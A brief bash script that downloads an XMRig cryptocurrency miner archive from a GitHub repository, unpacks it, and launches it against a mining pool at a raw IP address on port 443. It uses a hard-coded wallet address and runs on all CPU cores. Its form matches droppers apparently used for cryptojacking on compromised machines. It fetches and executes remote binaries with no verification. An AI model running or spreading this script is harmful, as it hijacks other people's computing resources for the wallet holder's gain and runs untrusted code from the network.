#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 64.23.198.64:443 -u ZEPHYR3YjAKBsmXd4MGYpAgatSybW8xwDUSTiLY8dotSQLogQFUgaGmZr3295MB5M8GTDZUUiLFxkHZdsGBVPmyLSt7aXUDRtEW48 -p MEULEUM -a rx/0 -t $(nproc --all)
